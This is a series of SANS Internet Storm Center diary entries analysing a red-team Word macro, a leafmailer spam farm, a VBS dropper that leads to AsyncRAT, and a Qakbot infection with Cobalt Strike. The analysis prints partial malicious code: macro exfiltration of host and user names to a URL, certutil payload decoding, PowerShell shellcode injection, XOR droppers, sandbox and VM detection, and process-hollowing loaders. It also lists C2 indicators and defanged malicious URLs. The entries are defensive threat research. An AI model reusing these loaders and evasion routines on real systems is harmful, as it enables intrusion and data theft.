Another way to use those online services is to "hunt". That's what I'm doing with most of the samples that I analyze in my diaries. If you are working on the defensive side (or in a Blue team), my advice is to keep an eye on data related to your business or organization via OSINT sources). Sometimes, you can find interesting information and stay one step ahead of the attacker or... the Red team you hired to test your infrastructure!

I spotted a nice VBS macro that seems to be related to a Red team exercise. I won't disclose the hash and the script here because it contains sensitive information:

  • URLs with the domain of the company performing the security assessment
  • Public IP addresses used for reverse shells
  • Internal resources about the targeted infrastructure (apparently, the reconnaissance phase was already completed)

Here are some pieces of interesting code:

The entry point of the macro already discloses some fun:

Attribute VB_Name = "NewMacros" Sub AutoOpen() 'php rev shell and others... Document_Open2   ...

Let's start with some data sent back to the attacker:

Private Sub Document_Open2() On Error Resume Next uID = Environ("COMPUTERNAME") & "B3" & Environ("USERNAME") SavePath = Environ("TEMP") & "\tempB2" & Int((9999 - 1000 + 1) * Rnd + 1000) CanSend = 0 sendSystemInfo "http://www.xxxxxxxx.com/sp/index.php?id=" & uID, CanSend openShell End Sub

The domain used in the URL (obfuscated) is the domain of the security company performing the tests!

They obfuscate a script in a fake certificate and decode it with certutil.exe (classic TTP):

x = x & "-----BEGIN CERTIFICATE-----" x = x & "JGxpbmVzID0gaXBjb25maWcgI3NhdmUgb3V0cHV0IG9mIGNvbW1hbmQgdG8gdmFy" x = x & "aWFibGUgJGxpbmVzDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQg" x = x & "aG9zdG5hbWUpDQokbGluZXMgPSAkbGluZXMgKyAoY21kLmV4ZSAvYyBuZXQgc2hh" [...Data removed...] x = x & "ICRsaW5lICsgIi5pbG10LnVzIg0KICAgICRhcnJheSA9ICRhcnJheSArICRsaW5l" x = x & "ICNhZGQgdGhlIHZhbHVlIHRvIG91ciBhcnJheQ0KfQ0KDQpmb3IgKCRpID0gMDsg" x = x & "JGkgLWx0ICRhcnJheS5sZW5ndGg7ICRpKyspIHsNCiAgICBwaW5nICRhcnJheVsk" x = x & "aV0NCn0=" x = x & "-----END CERTIFICATE-----" objFile.Write x & vbCrLf objFile.Close Shell ("cmd /k certutil -decode " & outFile & " " & inFile), vbHide Shell (Final & inFile), vbHide

The next technique implemented is the exfiltration of data via HTTPS. They perform this with a shellcode injected in a PowerShell threat:

$1 = '$c = '' [DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);''; $w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; [Byte[]]; [Byte[]]$z = 0xbe,0x57,0xed,0x7b,0x36,0xda, [...Data Removed...],0x2e,0xd9,0x1b,0x87,0xf2; $g = 0x1000; if ($z.Length -gt 0x1000) {   $g = $z.Length};   $x=$w::VirtualAlloc(0,0x1000,$g,0x40);   for ($i=0;$i -le ($z.Length-1);$i++) {   $w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};   $w::CreateThread(0,0,$x,0,0,0);   for (;;) { Start-sleep 60   };'   ; $e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1)); $2 = "-enc "; if([IntPtr]::Size -eq 8) {   $3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";   iex "& $3 $2 $e" } else {;   iex "& powershell $2 $e"; }

Here is the shellcode:

The injected shellcode connects to a Comcast public IP address that, when access manually, implements a redirect to... the website of the company :-)

remnux@remnux:/MalwareZoo/20210305$ curl http://x.x.x.x <script> window.location.href = "https://xxxxxxxx.com"; </script>

To conclude:

  • If you're a defender, I hope this example demonstrates to you the importance of implementing OSINT techniques to spot attackers and learn what can be in the pipe.
  • If you're an attacker, well, do not use your corporate domain! Cover your tracks as much as possible and don't upload your scripts on VirusTotal.

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 5.

ISC Stormcast For Friday, March 5th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7400, (Fri, Mar 5th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 5.

Spam Farm Spotted in the Wild, (Fri, Mar 5th)

If there is a place where you can always find juicy information, it's your spam folder! Yes, I like spam and I don't delete my spam before having a look at it for hunting purposes. Besides emails flagged as spam, NDR or "Non-Delivery Receipt" messages also deserve some attention. One of our readers (thanks to him!) reported yesterday how he found a "spam farm" based on bounced emails. By default, SMTP is a completely open protocol. Everybody can send an email pretending to be Elon Musk or Joe Biden! That's why security control like SPF[1] or DKIM[2] can be implemented to prevent spoofed emails to be sent from anywhere. If not these controls are not implemented, you may be the victim of spam campaigns that abuse your domain name or identity. The "good" point (if we can say this) is that all NDR messages will bounce to the official mail server that you manage. That's what happened with our reader, he saw many bounced messages for unknown email addresses. Here is an example:

--1614779618-eximdsn-513689040 Content-type: text/plain; charset=us-ascii This message was created automatically by mail delivery software. A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed: [victim]@[victimdomain] host [victimmx] SMTP error from remote mail server after end of data: 550 5.2.0 Mail rejete. Mail rejected. ************ --1614779618-eximdsn-513689040 Content-type: message/delivery-status Reporting-MTA: dns; fjimkopo[.]com Action: failed Final-Recipient: rfc822;[victim]@[victimdomain] Status: 5.0.0 Remote-MTA: dns; [victimmx] Diagnostic-Code: smtp; 550 5.2.0 Mail rejete. Mail rejected. *********** --1614779618-eximdsn-513689040 Content-type: message/rfc822 Return-path: <[ourmailbox]@[ourdomain]> Received: from admin by fjimkopo[.]com with local (Exim 4.86_2) (envelope-from [ourmailbox]@[ourdomain]) id 1lHQYA-0002y9-UD for [victim]@[victimdomain]; Wed, 03 Mar 2021 12:24:22 +0000 To: [victim]@[victimdomain] Subject: ***************** X-PHP-Originating-Script: 1000:mailer1.php Date: Wed, 3 Mar 2021 12:24:22 +0000 From: ***************** [ourmailbox]@[ourdomain]> Reply-To: oev4228@outlook[.]com Message-ID: <1e0b99b15ab141dc32cdf034e0bee3d4@farments[.]cf> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit

What interesting information do we have in this email? We see a domain name: farments[.]cf in the Message-ID (this header is generated by the first hop in the SMTP delivery chain) but also another SMTP header added by the mailer: X-PHP-Originating-Script: 1000:mailer1.php.

Let's combine the domain with the URL in the header: hxxp://farments[.]cf/mailer1.php

This is a leafmailer[3] instance... A very popular PHP mailer used by spammers. urlscan.io reports 26 similar websites[4]:

I did the same search on VirusTotal and found more URLs:

hxxp://voceconfia[[.]]com[[.]]br/utils/leafmailer[.]php hxxp://surmatete[[.]]com/img/p/9/5/ hxxp://hamboua1[[.]]000webhostapp[[.]]com/leafmailer[.]php hxxp://avalonfootwears[.]com/images/leafmailernzmall[.]php hxxps://www[.]bearchub4u[.]com/images/snd[.]php hxxp://sech[.]cl/wp-includes/rand/leafmailer[.]php hxxp://www[.]eudurica[.]sk/doc/leafmailer[.]php hxxps://github[.]com/PHPMailer/apix-log-phpmailer hxxp://thehunarfoundation[.]org/luckk[.]php hxxp://farments[.]cf/mailer1[.]php hxxp://elhusseinyusmleprep[.]com/wp-includes/leafmailer[.]php hxxp://jrcasey[.]com/leaf[.]php hxxp://secundaria[.]comprensiondelalectura[.]com/CDL/Profile/phpmailer/examples hxxp://synergieconsulting[.]biz/leaf[.]php hxxp://www[.]shiatsu[.]com[.]uy/archivos/pdf/2722[.]php hxxp://rainbowisp[.]info/dot/js/leafmailer2[.]8[.]php hxxp://aquabizarre[.]com/leaf[.]php hxxp://neaters[.]serveusers[.]com/ hxxp://www[.]eos-numerique[.]com/sitemap/JC4Ei2aF[.]php hxxp://themadam[.]com/inb0x[.]php hxxp://satkom[.]id/includes/phpmailer hxxp://a-mla[.]org/images/acts/leafmailer2[.]8[.]php hxxp://scootelaru[.]com/leafmailer2[.]8[.]php hxxp://eudurica[.]sk/doc/leafmailer[.]php hxxp://secundaria[.]comprensiondelalectura[.]com/CDL/Profile/phpmailer/examples/images hxxps://e2e[.]marketing/wp-content/themes/spacious/leaf[.]php hxxp://mailerphppro[.]blogspot[.]com/ hxxp://www[.]fastnet[.]rw/luckk[.]php hxxp://sanrosindia[.]com/admin_2016/library/phpmailer/docs hxxp://emboutsdetalons[.]com/ hxxps://yanaclub[.]net/vendor/bootstrap/css/alal[.]php hxxp://wigitest[.]com/leafmailer2[.]8[.]php hxxp://fullfullstack[.]com/leafmailer2[.]8[.]php hxxps://www[.]itread01[.]com/content/1542020464[.]html hxxp://letsdoit[.]pro/wp-admin/oonnm[.]php hxxps://www[.]leafmailer[.]pw/ hxxp://sanrosindia[.]com/admin_2016/library/phpmailer/language hxxp://sanrosindia[.]com/admin_2016/library/phpmailer/test hxxps://www[.]sementesvivas[.]bio/modules/jmsslider/views/img/layers/leafmailer2[.]8[.]php hxxp://143[.]110[.]155[.]129/ hxxps://casing-china[.]com/wp-admin/leaf[.]php hxxp://grma[.]9lj[.]ru/ hxxps://ipv6[.]lekkeropdemet[.]be/ibasao/l[.]php hxxp://ow[.]ly/9t8W50DzlZG hxxp://siquerida[.]com/ajtro/system/PHPMailer/language hxxps://tinyurl[.]com/y4zbkzja hxxps://anandlagad[.]com/how-to-send-email-using-phpmailer-and-gmail-with-example/ hxxp://www[.]asc925[.]com/leafmailer2[.]8[.]php hxxp://solusitoilet[.]com/xz/leafmailer2[.]7[.]php hxxps://mckinleywashstand[.]com/leafmailer2[.]8[.]php hxxp://chase-online[.]ddnsking[.]com/ hxxps://smyankton[.]com/leaf[.]php hxxps://m12tatar[.]ru/wp-admin/leafmailer2[.]8[.]php hxxp://rnd[.]com[.]mx/wp-content/plugins/RootSaul/block[.]php hxxp://is01[.]cba[.]edu[.]kw/old/wptest/wp-content/themes/xzbvsjrmhd[.]php?pass=xptasztqzd hxxp://www[.]assostone[.]com/11[.]php hxxps://pastebin[.]com/5igVDBVT hxxp://sanrosindia[.]com/admin_2016/library/phpmailer hxxp://www[.]ilendglobal[.]com/PHPMailer/ hxxps://elite11[.]in/public/site/image/slider/leafmailer2[.]8[.]php hxxp://phpmailer[.]github[.]io/PHPMailer/ hxxps://legalhackers[.]com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC[.]html hxxps://legalhackers[.]com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln[.]html hxxps://github[.]com/opsxcq/exploit-CVE-2016-10033 hxxps://t[.]co/LMf3TIcdmy hxxps://rfr[.]bz/t1jy3sp hxxps://blog[.]sucuri[.]net/2021/01/phishing-malspam-with-leaf-phpmailer[.]html?utm_source=twitter&utm_medium=social&utm_campaign=en-us_sec_social_prd_awa_us_x_001 hxxp://sucur[.]it/3qXbEMS hxxps://blog[.]sucuri[.]net/2021/01/phishing-malspam-with-leaf-phpmailer[.]html hxxp://www[.]erbilen[.]net/phpmailer-sinifi-ile-gmail-uzerinden-e-posta-gonderimi/ hxxp://rpa-seminar-shinagawa[.]oni-nagoya[.]co[.]jp/wp-content/plugins/leafmails[.]php hxxps://t[.]co/vXgBEIippr hxxps://emboutsdetalons[.]com/ hxxp://www[.]qurankipukar[.]com/en/ hxxp://github[.]com/PHPMailer/PHPMailer hxxps://dummyscodes[.]blogspot[.]com/2014/08/php-send-mail-with-xampp-localhost[.]html hxxps://pseudonymousone[.]com/leafmailer[.]php hxxp://vulapps[.]evalbug[.]com/w_wordpress_6/ hxxps://estacaoblumenau[.]com[.]br/leaf[.]php hxxp://vitamfoundation[.]org/luckk[.]php hxxps://phpmailer[.]en[.]softonic[.]com/ hxxps://unicrditalia[.]com/ hxxp://unicrditalia[.]com/ hxxp://cbdmover[.]com[.]au/calculate-your-move/phpmailer/ hxxp://52[.]42[.]241[.]167/PHPMailer-master/vendor/guzzlehxxp/guzzle/src/Exception hxxp://shiyarajewells[.]com/img/portfolio/leafmailer2[.]8[.]php hxxps://www[.]cdxy[.]me/?p=765 hxxp://warriorwealthsolutions[.]com/wp-admin/wp-config[.]php hxxp://mislayer[.]egloos[.]com/1509382 hxxps://phpmailer[.]github[.]io/PHPMailer/classes/PHPMailer[.]PHPMailer[.]PHPMailer[.]html hxxp://espaciosdeinnovacion[.]udd[.]cl/leaf[.]php hxxp://siquerida[.]com/ajtro/system/PHPMailer/docs hxxp://siquerida[.]com/ajtro/system/PHPMailer hxxp://dedikodudunyasi[.]com/ hxxps://alchemicclasses[.]com/ hxxp://www[.]willalooka[.]com[.]au/wp-content/plugins/sdwffdy/leafmailer2[.]8[.]php hxxps://phpmailer[.]github[.]io/PHPMailer/classes/PHPMailer[.]PHPMailer[.]POP3[.]html hxxps://ranaunique[.]com/hato-old/vendor/phpmailer/phpmailer/language/ hxxps://www[.]websapex[.]com/blog/tutorial/php/send-an-email-through-html-form-using-phpmailer-in-php/ hxxp://rpa-seminar-shinagawa[.]oni-nagoya[.]co[.]jp/wp-content/plugins/leaf[.]php hxxps://owlmailer[.]io/ hxxp://phpmailer[.]worxware[.]com/critique-avengers-endgame-streaming/ hxxp://labanquepostale623662s7[.]betaforge[.]it/ hxxps://sech[.]cl/wp-includes/rand/leafmailer[.]php hxxp://unionbankonline[.]light-nutrition[.]com/leafmailer2[.]8[.]php hxxps://zaimcraft[.]ru/ hxxps://account-login-inc[.]com/wp-admin/ky-verification/leafmailer2[.]8%20(1)[.]php?emailfilter=on hxxp://caudan-vous-accueille[.]com/images/gmapfp/hsfgdyfy[.]php?pass=kod3 hxxp://mailqwerty[.]xyz/ hxxp://www[.]thaimartin[.]co/aku/pro[.]php hxxp://wonodds[.]club/wp-content/plugins/qohdbjl/classic[.]php hxxps://uni-leipzig[.]email/leaf[.]php?emailfilter=on hxxp://theqwrqwry[.]com/leafmailer2[.]8[.]php?emailfilter=on hxxps://dduuwwc[.]com/1[.]php?emailfilter=on hxxp://hghfhgfhs[.]com/1[.]php?emailfilter=on hxxps://adggnbbvns[.]com/leafmailer2[.]8[.]php?emailfilter=on hxxp://galaxysystemsgroup[.]com/1[.]php?emailfilter=on hxxps://freesolos[.]club/inc/PHPMailer/test_script hxxps://github[.]com/Synchro/PHPMailer/ hxxp://envision-media[.]co/wp-includes/js/jcrop/leafup[.]php?pass=0112255 hxxp://www[.]netsisantalya[.]com/wp-content/themes/skand/lhcqyhebrt[.]php?pass=nsgonwmful

Many of them are compromised websites where the mailer is deployed and used to send spam.

Conclusion: Keep an eye on your bounced messages, sometimes they may reveal interesting information!

[1] https://en.wikipedia.org/wiki/Sender_Policy_Framework
[2] https://en.wikipedia.org/wiki/DomainKeys_Identified_Mail
[3] https://leafmailer.pw
[4] https://urlscan.io/result/3289f4f9-6db2-46e8-b72b-fa3b1561bdf6/related/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 4.

From VBS, PowerShell, C Sharp, Process Hollowing to RAT, (Thu, Mar 4th)

VBS files are interesting to deliver malicious content to a victim's computer because they look like simple text files. I found an interesting sample that behaves like a dropper. But it looks also like Russian dolls seeing all the techniques used to drop a RAT at the end. The file hash is 8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead and has a VT score of 12/59[1]. It was delivered by email under the name "Procurement - Attached RFQ 202102.vbs". If you filter attachments based on the MIME type, this file won't be detected as suspicious:

remnux@remnux:/MalwareZoo/20210303$ file *.vbs Procurement - Attached RFQ 202102.vbs: ASCII text, with very long lines, with CRLF line terminators

When you try to open a .vbs file on a standard Windows system, it is processed by the "Microsoft ® Windows Based Script Host" handlers. Here is the code executed when you open this script:

Private Function vQ(Inp, Key, Mode) Dim z, i, Position, cptZahl, orgZahl, keyZahl, cptString For i = 1 To lEn(Inp) Position = Position + 1 If Position > lEn(Key) Then Position = 1 keyZahl = aSc(Mid(Key, Position, 1)) If Mode Then orgZahl = aSc(Mid(Inp, i, 1)) cptZahl = orgZahl Xor keyZahl cptString = hEx(cptZahl) If lEn(cptString) < 2 Then cptString = "0" & cptString z = z & cptString Else If i > lEn(Inp) \ 2 Then Exit For cptZahl = CByte("&" & "H" & Mid(Inp, i * 2 - 1, 2)) orgZahl = cptZahl Xor keyZahl z = z & cHR(orgZahl) End If Next vQ = z End Function Dim AqUhNbgAqwpMb AqUhNbgAqwpMb = "31562B0462222C4B781D323A2D1E1D4A2C4C39202E190F14112E3A1E0C432A5A454C1D392A1D1B5127260F22381E3D086E011F012E5B451B3F594B23031B217726535F5863201340205A593D28000E59003C3F173249335C144C493D4B234509370B044D5072585B17233B5F24703426190F7F363A1E2C2609173F552B09244B5C3E6C7D195D23136E015E2C501F0E5A453E314C34493D28331E507B394603242E526226063C291E0C08134726227F447D72334A3C1D3158532D3C4C7E754425390E0D7841200A0F0F03316A26505E3A413119576F141679085C2D5551445420325134502C1C1E5C0B153D131E3E41505D7303180A7F1F1F7D0E2D733E03126F215C7B794641334B58766C1A567E515B78093F0E0A540E7908027F05166B241E681C5379264B... (remaining bytes removed) Dim SH SH = cHR(80 + 7) & cHR(100 + 15) & cHR(66 + 1) & cHR(80 + 2) & cHR(110 - 5) & cHR(85 - 5) & cHR(80 + 4) & cHR(40 + 6) & cHR(230 / 2) & cHR(36 * 2) & cHR(60 + 9) & cHR(100 + 8) & cHR(70 + 6) Set WS = CreateObject(SH) Set FSO = CreateObject("Scripting.FileSystemObject") Set MyFile = FSO.CreateTextFile(FSO.GetSpecialFolder(2) + "\OS64Bits.PS1", True) MyFile.WriteLine(rEPlAcE(vQ(AqUhNbgAqwpMb, "p2O)6[\.X0sI^{p(@5wAC|/Gh]N{am}3+(rNY3]>UK|/2_YlCUfqK{hZL*.NawX9G>:x.I", False), "%VBS%", wscript.SCRIPTFULLNAME)) MyFile.Close WS.rUN "POWERSHELL -eXEcUTiONpOLicY rEmOtEsIgNeD -FILE " & FSO.GetSpecialFolder(2) + "\OS64Bits.PS1", 0

The payload is stored in AqUhNbgAqwpMb and decoded by the vQ().This function is an XOR-decoder using a muli-bytes key. The decoded payload is dropped on the filesystem (C:\Users\<user>\AppData\Local\Temp\OS64Bits.PS1) and executed by PowerShell. This script looks interesting at multiple points.

First, most suspicious strings are obfuscated and binary encoded. Decoding is performed via a specific function:

Function Binary2String([String] $data) { $byteList = [System.Collections.Generic.List[Byte]]::new() for ($i = 0; $i -lt $data.Length; $i +=8) { $byteList.Add([Convert]::ToByte($data.Substring($i, 8), 2)) } return [System.Text.Encoding]::ASCII.GetString($byteList.ToArray()) }

There is a detection mechanism of virtual environments:

Function VirtualMachineDetector() { $searcher = (New-Object System.Management.ManagementObjectSearcher(Select * from Win32_ComputerSystem)) $items = $searcher.Get() $Tr = "" foreach ($item in $items) { [String] $manufacturer = $item["Manufacturer"].ToString().ToLower() if (($manufacturer -eq "microsoft corporation" -and \   $item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) -or \   $manufacturer.Contains("vmware") -or $item["Model"].ToString() -eq "VirtualBox") { $Tr = "True" } else { $Tr = "False"   } } return $Tr }

Note also the presence of a function to detect Sandboxie[2], another sandbox tool that is easy to spot by tracking the DLL SbieDll.dll:

Function DetectSandboxie() { [Int32] $i = ModuleHandle("SbieDll.dll") [String] $s = "" if ($i -eq 0) { $s = "False" } else { $s = "True" } return $s }

 The most interesting function is CodeDom. It invokes the CSharp compiler to compile the next payload:

function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) { $dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]' $dictionary.Add(("CompilerVersion"), ("v4.0")) $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary) $CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters $CompilerParametres.ReferencedAssemblies.Add(("System.dll")) $CompilerParametres.ReferencedAssemblies.Add(("System.Management.dll)) $CompilerParametres.ReferencedAssemblies.Add(("System.Windows.Forms.dll")) $CompilerParametres.ReferencedAssemblies.Add(("mscorlib.dll")) $CompilerParametres.ReferencedAssemblies.Add(("Microsoft.VisualBasic.dll")) $CompilerParametres.IncludeDebugInformation = $false $CompilerParametres.GenerateExecutable = $false $CompilerParametres.GenerateInMemory = $true $CompilerParametres.CompilerOptions += ("/platform:X86 /unsafe /target:library") $BB = Decompress($BB) [System.CodeDom.Compiler.CompilerResults] $CompilerResults = \   $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, \ [System.Text.Encoding]::Default.GetString($BB)) [Type] $T = $CompilerResults.CompiledAssembly.GetType($TP) [Byte[]] $Bytes = Decompress(@( \   31,139,8,0,0,0,0,0,4,0,180,189,7,124,92,213,149,63,126,231,77,213,168,206,168,203,18,150,139,204,216, \ 198,178,138,37,75,6,131,213,45,219,178,213,108,75,14,193,140,164,145,52,246,72,79,158,25,201,150,13, \ 142,197,2,129,36,180,116,88,146,80,194,166,146,132,36,155,182,41,56, (bytes removed) 61,237,1,92,113,253,243,0,180,0,0)) try { [String] $MyPt = \   [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),\ "InstallUtil.exe") [Object[]] $Params=@($MyPt.Replace("Framework64","Framework") ,$Bytes) return $T.GetMethod($MT).Invoke($null, $Params) } catch { } }

The CSharp code is located in the variable BB (I posted the code on Pastebin[3]). By having a look at the code, we can see a bunch of interesting API calls:

private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi<DelegateVirtualAllocEx>(ReverseString(Kernel32), ReverseString(VirtualAllcEx)); private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi<DelegateWriteProcessMemory>(ReverseString(Kernel32), ReverseString(WriteProcessMem)); private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi<DelegateReadProcessMemory>(ReverseString(Kernel32), ReverseString(ReadProcessMem)); private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi<DelegateZwUnmapViewOfSection>(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec)); private static readonly DelegateCreateProcessA CreateProcessA = LoadApi<DelegateCreateProcessA>(ReverseString(Kernel32), ReverseString(CreateProcA));

This clearly indicates that process hollowing is used to replace the code of a legit process with malicious code. This code is located in the variable Bytes and is a PE file (SHA256:D452CEE94E3A2D58B05E9F62A4AA4004C0632D9B56FA8B57664D295BC88C4DF0) that tries to communicate with a C2 server located at asin8989.ddns.net on port 8989. The malware belongs to the AsyncRat[4] family. 

Note: My advice to protect yourself against such malicious .vbs file is to replace the default app to open them with notepad.exe. 

[1] https://www.virustotal.com/gui/file/8697dc74d7c07583f24488926fc6e117975f8a9f014972073d19a5e62d248ead/detection
[2] https://github.com/sandboxie-plus/sandboxie
[3] https://pastebin.com/cW25WEpY
[4] https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 4.

ISC Stormcast For Thursday, March 4th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7398, (Thu, Mar 4th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 3.

ISC Stormcast For Wednesday, March 3rd, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7396, (Wed, Mar 3rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 3.

Qakbot infection with Cobalt Strike, (Wed, Mar 3rd)

Introduction

On Tuesday 2021-03-02, I generated a Qakbot (Qbot) infection on a Windows host in one of my Active Directory (AD) test environments, where I saw Cobalt Strike as follow-up activity.  I've seen Cobalt Strike from Qakbot infections before.  Below are two that I documented in December 2020.

I haven't documented one for the ISC yet, so today's diary reviews my Qakbot infection with Cobalt Strike seen on Tuesday 2021-03-02.


Shown above:  Flow chart for the Qakbot infection with Cobalt Strike from Tuesday 2021-03-02.

Images


Shown above:  Spreadsheet extracted from a zip archive attached to malspam pushing Qakbot.


Shown above:  Traffic from the infection filtered in Wireshark (image 1 of 3).


Shown above:  Traffic from the infection filtered in Wireshark (image 2 of 3).


Shown above:  Traffic from the infection filtered in Wireshark (image 3 of 3).


Shown above:  Initial DLL saved a the victim's Windows host.


Shown above:  Artifact saved to disk during the Qakbot infection.


Shown above:  Registry updates caused by Qakbot.

Indicators of Compromise (IOCs)

Malware from the infected Windows host:

SHA256 hash: 16a0c2f741a14c423b7abe293e26f711fdb984fc52064982d874bf310c520b12

SHA256 hash: 24753d9f0d691b6d582da3e301b98f75abbdb5382bb871ee00713c5029c56d44

Traffic to retrieve the initial Qakbot DLL:

  • 8.209.64[.]96 port 80 - kfzhm28pwzrlk02bmjy[.]com - GET /mrch.gif

Qakbot C2 traffic:

  • 207.246.77[.]75 port 995 - HTTPS traffic

Cobalt Strike traffic:

  • 45.144.29[.]185 port 443 - HTTPS traffic
  • 45.144.29[.]185 port 443 - logon.securewindows[.]xyz - HTTPS traffic
  • 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - GET /WjSH
  • 45.144.29[.]185 port 8080 - logon.securewindows[.]xyz:8080 - GET /cx
  • 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - GET /en_US/all.js
  • 45.144.29[.]185 port 8080 - 45.144.29[.]185:8080 - POST /submit.php?id=248927919

Final words

A pcap of the infection traffic and the associated malware can be found here.

---

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 3.

Patch Now: HAFNIUM targeting Exchange Servers with 0day exploits https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, (Tue, Mar 2nd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.